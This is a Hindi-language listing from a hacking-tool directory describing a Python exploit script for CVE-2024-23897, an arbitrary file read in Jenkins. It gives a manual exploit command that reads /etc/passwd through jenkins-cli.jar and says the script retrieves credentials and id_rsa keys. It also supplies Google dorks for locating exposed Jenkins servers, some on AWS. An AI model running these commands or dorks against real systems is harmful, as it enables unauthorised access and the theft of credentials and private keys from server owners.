Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-23897-Arbitrary-file-read — CVE-2024-23897 भेद्यता को स्वचालित करने के लिए python में बनाई गई एक स्क्रिप्ट। | Kitploit
उपकरण/GitHubGitHub/pulentoski/cve-2024-23897-arbitrary-file-read
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubpulentoski/cve-2024-23897-arbitrary-file-read

CVE-2024-23897-Arbitrary-file-read

CVE-2024-23897 भेद्यता को स्वचालित करने के लिए python में बनाई गई एक स्क्रिप्ट।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

🤵🏻 CVE-2024-23897 Arbitrary-file-read 🤵🏻


प्रभावित संस्करण:

  • Jenkins 2.441 और पुराने संस्करण।
  • Jenkins LTS 2.426.2 और पुराने संस्करण।

CVE-2024-23897 भेद्यता को स्वचालित करने के लिए पायथन में बनाई गई एक स्क्रिप्ट 🤖 🛠️

यह पायथन कोड Jenkins सर्वरों में एक विशिष्ट भेद्यता (CVE-2024-23897) के लिए एक स्कैनर प्रस्तुत करता है। यह उपयोगकर्ता से Jenkins सर्वर का URL मांगकर शुरू होता है।

फिर, यह कमांड लाइन से Jenkins के साथ इंटरैक्ट करने के लिए आवश्यक "jenkins-cli.jar" फ़ाइल डाउनलोड करने का विकल्प प्रदान करता है। इसके बाद, यह विकल्पों का एक मेनू प्रस्तुत करता है जिसमें सर्वर, पर्यावरण, Jenkins कॉन्फ़िगरेशन, उपयोगकर्ताओं, क्रेडेंशियल्स की जानकारी प्राप्त करने जैसे कमांड चलाना शामिल है, साथ ही "/etc/passwd", "/etc/os-release" और "id_rsa" जैसी संवेदनशील फ़ाइलों को पढ़ना भी शामिल है।

एक बार मेनू से एक विकल्प चुने जाने पर, प्रदान किए गए Jenkins सर्वर पर संबंधित कमांड निष्पादित किया जाता है। कोड फ़ाइल डाउनलोड करने और कमांड निष्पादित करने के लिए फ़ंक्शनों के साथ संरचित है, और प्रोग्राम के प्रवाह को संभालने के लिए एक मुख्य फ़ंक्शन है।

Jenkins सर्वर के लिए निष्पादन 📝:

root@kitploit:~
python3 CVE-2024-23897-A-scaner.py 

DOCKER में Jenkins सर्वर के लिए निष्पादन 📝:

root@kitploit:~
python3  CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------

मैन्युअल निष्पादन।

1- jenkins-cli.jar डाउनलोड करें: http:///jnlpJars/jenkins-cli.jar

2- LFI करने के लिए, निष्पादित करें: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"


डॉर्क सूची:

intitle:"Dashboard [Jenkins]" inurl:"/login"

intitle:"Jenkins" "Dashboard"

inurl:"/computer/" intitle:"Jenkins"

inurl:"/script" intitle:"Jenkins"

"Jenkins [Jenkins]" intitle:"Login"

intitle:"Jenkins" "Jenkins ver. 2.441"

inurl:"/manage" intitle:"Jenkins"

site:.com intitle:"Jenkins"

site:aws.amazon.com intitle:"Jenkins"

filetype:xml inurl:"jenkins/config.xml"

टूल डाउनलोड करें